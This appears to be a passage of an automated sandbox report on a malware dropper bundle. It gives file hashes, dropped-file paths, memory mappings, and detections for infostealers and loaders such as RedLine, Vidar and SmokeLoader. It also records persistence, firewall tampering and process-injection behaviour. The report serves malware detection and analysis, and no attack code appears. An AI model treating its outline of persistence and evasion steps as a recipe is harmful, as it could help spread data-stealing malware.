SHA512 1507f3d3a32c8c0d1ae2ee2a6f02f86f7de5f956ef066c7284ff4f847a5fe8322984043ee95b576eb4d40b2f08508e49059a581443605978ec4cba03da1273a6

\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat20474d8e68c3f86b.exe

MD5 8887a710e57cf4b3fe841116e9a0dfdd
SHA1 8c1f068d5dda6b53db1c0ba23fd300ac2f2197c4
SHA256 e045b4a1c9f6640814f6e39903e1f03f2c7f1e3b3d1c6dbf07a409732655eff4
SHA512 1507f3d3a32c8c0d1ae2ee2a6f02f86f7de5f956ef066c7284ff4f847a5fe8322984043ee95b576eb4d40b2f08508e49059a581443605978ec4cba03da1273a6

\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat204ab24d039a58be8.exe

MD5 f79878c5bb37eaf44b6632dfdf5207a0
SHA1 175d67306e3c8795da5d7a6bed638ed071dd3cbb
SHA256 5bc06297cbc3f94d9794721ef91fa737da870c7a822efd5e603516153074fbb3
SHA512 a98e69b463a6a8cfd71cd1767c037ae337feab8aec30b615b8f35adc4347d32230147097fa3204600c1d66d3b2f8e99f9716fc263bb7af048153828d048bf919

memory/2028-152-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat204ab24d039a58be8.exe

MD5 f79878c5bb37eaf44b6632dfdf5207a0
SHA1 175d67306e3c8795da5d7a6bed638ed071dd3cbb
SHA256 5bc06297cbc3f94d9794721ef91fa737da870c7a822efd5e603516153074fbb3
SHA512 a98e69b463a6a8cfd71cd1767c037ae337feab8aec30b615b8f35adc4347d32230147097fa3204600c1d66d3b2f8e99f9716fc263bb7af048153828d048bf919

\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat204ab24d039a58be8.exe

MD5 f79878c5bb37eaf44b6632dfdf5207a0
SHA1 175d67306e3c8795da5d7a6bed638ed071dd3cbb
SHA256 5bc06297cbc3f94d9794721ef91fa737da870c7a822efd5e603516153074fbb3
SHA512 a98e69b463a6a8cfd71cd1767c037ae337feab8aec30b615b8f35adc4347d32230147097fa3204600c1d66d3b2f8e99f9716fc263bb7af048153828d048bf919

\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\Sat204ab24d039a58be8.exe

MD5 f79878c5bb37eaf44b6632dfdf5207a0
SHA1 175d67306e3c8795da5d7a6bed638ed071dd3cbb
SHA256 5bc06297cbc3f94d9794721ef91fa737da870c7a822efd5e603516153074fbb3
SHA512 a98e69b463a6a8cfd71cd1767c037ae337feab8aec30b615b8f35adc4347d32230147097fa3204600c1d66d3b2f8e99f9716fc263bb7af048153828d048bf919

\Users\Admin\AppData\Local\Temp\is-23SB5.tmp\Sat20474d8e68c3f86b.tmp

MD5 090544331456bfb5de954f30519826f0
SHA1 8d0e1fa2d96e593f7f4318fa9e355c852b5b1fd4
SHA256 b32cbc6b83581d4dc39aa7106e983e693c5df0e0a28f146f0a37bc0c23442047
SHA512 03d5cbc044da526c8b6269a9122437b8d386530900e2b8452e4cf7b3d36fc895696cbe665e650a9afbdec4bad64a3dc0f6f5e1309e07f6f1407ec0643cac121d

memory/584-158-0x0000000000000000-mapping.dmp

memory/1204-159-0x0000000000400000-0x000000000046D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-23SB5.tmp\Sat20474d8e68c3f86b.tmp

MD5 090544331456bfb5de954f30519826f0
SHA1 8d0e1fa2d96e593f7f4318fa9e355c852b5b1fd4
SHA256 b32cbc6b83581d4dc39aa7106e983e693c5df0e0a28f146f0a37bc0c23442047
SHA512 03d5cbc044da526c8b6269a9122437b8d386530900e2b8452e4cf7b3d36fc895696cbe665e650a9afbdec4bad64a3dc0f6f5e1309e07f6f1407ec0643cac121d

memory/1312-162-0x0000000001060000-0x000000000108E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-23SB5.tmp\Sat20474d8e68c3f86b.tmp

MD5 090544331456bfb5de954f30519826f0
SHA1 8d0e1fa2d96e593f7f4318fa9e355c852b5b1fd4
SHA256 b32cbc6b83581d4dc39aa7106e983e693c5df0e0a28f146f0a37bc0c23442047
SHA512 03d5cbc044da526c8b6269a9122437b8d386530900e2b8452e4cf7b3d36fc895696cbe665e650a9afbdec4bad64a3dc0f6f5e1309e07f6f1407ec0643cac121d

\Users\Admin\AppData\Local\Temp\is-LQ3GF.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

\Users\Admin\AppData\Local\Temp\is-LQ3GF.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

\Users\Admin\AppData\Local\Temp\is-LQ3GF.tmp\idp.dll

MD5 8f995688085bced38ba7795f60a5e1d3
SHA1 5b1ad67a149c05c50d6e388527af5c8a0af4343a
SHA256 203d7b61eac96de865ab3b586160e72c78d93ab5532b13d50ef27174126fd006
SHA512 043d41947ab69fc9297dcb5ad238acc2c35250d1172869945ed1a56894c10f93855f0210cbca41ceee9efb55fd56a35a4ec03c77e252409edc64bfb5fb821c35

memory/1772-167-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe

MD5 4b37248b884a6da97515dbb65f0c6c09
SHA1 e4102a6c1296d0cc14379a5573938999ab4dcdbe
SHA256 b46346a80b171843820385f916b716efaa3451aea46ae8857739af6da256f2ce
SHA512 1ff5b21e9739b2b18ecbabc8def2118ff1bcb58589d39a100ac3c9a64c462d40f9f4335c3c143f6ab9e9ef5f0c83e0d66a20a7a724e48dc869829971f986b41d

\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe

MD5 4b37248b884a6da97515dbb65f0c6c09
SHA1 e4102a6c1296d0cc14379a5573938999ab4dcdbe
SHA256 b46346a80b171843820385f916b716efaa3451aea46ae8857739af6da256f2ce
SHA512 1ff5b21e9739b2b18ecbabc8def2118ff1bcb58589d39a100ac3c9a64c462d40f9f4335c3c143f6ab9e9ef5f0c83e0d66a20a7a724e48dc869829971f986b41d

\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe

MD5 4b37248b884a6da97515dbb65f0c6c09
SHA1 e4102a6c1296d0cc14379a5573938999ab4dcdbe
SHA256 b46346a80b171843820385f916b716efaa3451aea46ae8857739af6da256f2ce
SHA512 1ff5b21e9739b2b18ecbabc8def2118ff1bcb58589d39a100ac3c9a64c462d40f9f4335c3c143f6ab9e9ef5f0c83e0d66a20a7a724e48dc869829971f986b41d

memory/1760-171-0x0000000072650000-0x0000000072BFB000-memory.dmp

memory/2028-172-0x0000000000B80000-0x0000000000CC2000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS0C7D2C0C\setup_install.exe

MD5 4b37248b884a6da97515dbb65f0c6c09
SHA1 e4102a6c1296d0cc14379a5573938999ab4dcdbe
SHA256 b46346a80b171843820385f916b716efaa3451aea46ae8857739af6da256f2ce
SHA512 1ff5b21e9739b2b18ecbabc8def2118ff1bcb58589d39a100ac3c9a64c462d40f9f4335c3c143f6ab9e9ef5f0c83e0d66a20a7a724e48dc869829971f986b41d

memory/1312-174-0x00000000002D0000-0x00000000002F0000-memory.dmp

memory/1204-175-0x0000000000400000-0x000000000046D000-memory.dmp

memory/548-176-0x0000000003C70000-0x0000000003EC4000-memory.dmp

memory/524-177-0x0000000064940000-0x0000000064959000-memory.dmp

memory/1760-179-0x0000000072650000-0x0000000072BFB000-memory.dmp

memory/548-178-0x0000000003C70000-0x0000000003EC4000-memory.dmp

memory/484-181-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\chrome3.exe

MD5 4b0d49f7c8712d7a0d44306309f2e962
SHA1 5f0a2536f215babccf860c7ccdeaf7055bb59cad
SHA256 f996915ce7203dc3661afa686637426fab14c91682ada02054d2f64ce245af60
SHA512 50dc00bebdafdc2cc1792a45cab5f13773ff0026c20618eec29f50000261afba65f58cec5d30be0fd5aaea17cac30b97b16be70c6f430987cd10a8488948ee2b

memory/484-183-0x000000013F380000-0x000000013F390000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\chrome3.exe

MD5 4b0d49f7c8712d7a0d44306309f2e962
SHA1 5f0a2536f215babccf860c7ccdeaf7055bb59cad
SHA256 f996915ce7203dc3661afa686637426fab14c91682ada02054d2f64ce245af60
SHA512 50dc00bebdafdc2cc1792a45cab5f13773ff0026c20618eec29f50000261afba65f58cec5d30be0fd5aaea17cac30b97b16be70c6f430987cd10a8488948ee2b

memory/1760-184-0x0000000072650000-0x0000000072BFB000-memory.dmp

memory/1572-185-0x0000000000000000-mapping.dmp

memory/484-186-0x0000000000660000-0x000000000066E000-memory.dmp

memory/388-188-0x0000000000000000-mapping.dmp

memory/484-187-0x000007FEFB531000-0x000007FEFB533000-memory.dmp

memory/704-189-0x0000000000000000-mapping.dmp

memory/1452-190-0x0000000000000000-mapping.dmp

memory/1452-191-0x000000013FD70000-0x000000013FD80000-memory.dmp

memory/1448-193-0x0000000000000000-mapping.dmp

memory/784-195-0x0000000000000000-mapping.dmp

memory/1160-196-0x000000013F680000-0x000000013F686000-memory.dmp

memory/1160-194-0x0000000000000000-mapping.dmp

memory/1100-197-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1100-198-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1100-200-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1100-202-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1100-204-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1100-206-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1100-207-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1100-208-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1100-210-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1100-212-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1100-214-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1100-213-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1100-217-0x000000014030F3F8-mapping.dmp

memory/1100-216-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1100-220-0x00000000000E0000-0x0000000000100000-memory.dmp

memory/1100-219-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1100-221-0x0000000140000000-0x0000000140786000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted 2023-01-10 09:49

Reported 2023-01-10 09:52

Platform win10v2004-20221111-en

Max time kernel 7s

Max time network 150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\fc0ce6a2471e5145519920cdcfcc24c09f1a0d3449c235fa71dcd27fac9c5f60.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Smokeloader packer

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

NullMixer

dropper nullmixer

NyMaim

trojan nymaim

OnlyLogger

loader onlylogger

PrivateLoader

loader privateloader

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe

RedLine

infostealer redline

SmokeLoader

trojan backdoor smokeloader

Tofsee

trojan tofsee

Vidar

stealer vidar

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Creates new service(s)

persistence

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fc0ce6a2471e5145519920cdcfcc24c09f1a0d3449c235fa71dcd27fac9c5f60.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A

Reads user/profile data of web browsers

spyware stealer

Uses the VBS compiler for execution

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat2060d0e3bfa5f726.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat2060d0e3bfa5f726.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat2060d0e3bfa5f726.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat2060d0e3bfa5f726.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat2060d0e3bfa5f726.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat2060d0e3bfa5f726.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\Temp\123.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat2060d0e3bfa5f726.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat2060d0e3bfa5f726.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\Temp\321.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat2060d0e3bfa5f726.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat2060d0e3bfa5f726.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\Shw5TK06iKgZOYTsQkCnwxbv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat2060d0e3bfa5f726.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\hVc81UAyx3ob_zfwfBaFesk3.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\bxmgedut\hbriljmv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\3FrOcX1AbJQcmi5mvBqmmZ83.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20049528047bed.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20049528047bed.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20049528047bed.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20748e484444d9200.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2728 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\fc0ce6a2471e5145519920cdcfcc24c09f1a0d3449c235fa71dcd27fac9c5f60.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2728 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\fc0ce6a2471e5145519920cdcfcc24c09f1a0d3449c235fa71dcd27fac9c5f60.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2728 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\fc0ce6a2471e5145519920cdcfcc24c09f1a0d3449c235fa71dcd27fac9c5f60.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1284 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe
PID 1284 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe
PID 1284 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe
PID 5048 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 804 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 804 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 804 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 4016 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 4016 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 4016 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 3708 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 3708 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 3708 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 3156 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 3156 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 3156 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 804 wrote to memory of 2132 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20644077cb3868ccd.exe
PID 804 wrote to memory of 2132 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20644077cb3868ccd.exe
PID 804 wrote to memory of 2132 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20644077cb3868ccd.exe
PID 452 wrote to memory of 384 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20049528047bed.exe
PID 452 wrote to memory of 384 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20049528047bed.exe
PID 452 wrote to memory of 384 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20049528047bed.exe
PID 2836 wrote to memory of 4280 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2836 wrote to memory of 4280 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2836 wrote to memory of 4280 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4016 wrote to memory of 2256 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat2027462f7d873c4.exe
PID 4016 wrote to memory of 2256 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat2027462f7d873c4.exe
PID 2592 wrote to memory of 1172 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat2060d0e3bfa5f726.exe
PID 2592 wrote to memory of 1172 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat2060d0e3bfa5f726.exe
PID 2592 wrote to memory of 1172 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat2060d0e3bfa5f726.exe
PID 3156 wrote to memory of 808 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20748e484444d9200.exe
PID 3156 wrote to memory of 808 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20748e484444d9200.exe
PID 3708 wrote to memory of 4816 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20e3fc574eb.exe
PID 3708 wrote to memory of 4816 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20e3fc574eb.exe
PID 3708 wrote to memory of 4816 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20e3fc574eb.exe
PID 3500 wrote to memory of 2224 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20474d8e68c3f86b.exe
PID 3500 wrote to memory of 2224 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20474d8e68c3f86b.exe
PID 3500 wrote to memory of 2224 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20474d8e68c3f86b.exe
PID 2408 wrote to memory of 4804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WerFault.exe
PID 2408 wrote to memory of 4804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WerFault.exe
PID 2408 wrote to memory of 4804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WerFault.exe
PID 2224 wrote to memory of 1840 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20474d8e68c3f86b.exe C:\Users\Admin\AppData\Local\Temp\is-K72FH.tmp\Sat20474d8e68c3f86b.tmp
PID 2224 wrote to memory of 1840 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20474d8e68c3f86b.exe C:\Users\Admin\AppData\Local\Temp\is-K72FH.tmp\Sat20474d8e68c3f86b.tmp
PID 2224 wrote to memory of 1840 N/A C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20474d8e68c3f86b.exe C:\Users\Admin\AppData\Local\Temp\is-K72FH.tmp\Sat20474d8e68c3f86b.tmp
PID 4804 wrote to memory of 2260 N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\bxmgedut\hbriljmv.exe
PID 4804 wrote to memory of 2260 N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\bxmgedut\hbriljmv.exe

Processes

